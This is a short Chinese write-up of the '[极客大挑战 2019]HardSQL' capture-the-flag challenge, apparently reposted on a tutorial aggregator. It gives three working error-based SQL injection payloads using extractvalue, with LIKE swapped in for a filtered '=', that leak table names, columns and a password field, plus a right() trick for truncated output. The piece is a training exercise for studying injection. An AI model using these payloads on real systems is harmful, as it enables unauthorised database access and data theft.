[极客大挑战 2019]HardSQL

本文主要是介绍[极客大挑战 2019]HardSQL，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

在尝试的过程中发现过滤了=，这里我们可以使用like进行替换，然后就是正常的报错注入流程了

爆名

admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#

爆字段

admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#

查数据

admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#

这里最关键的点来了，我们爆出来的是部分flag

extractvalue和updatexml只显示32围字符

所以我们需要使用right()函数爆出右边的部分flag

这篇关于[极客大挑战 2019]HardSQL的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

Java教程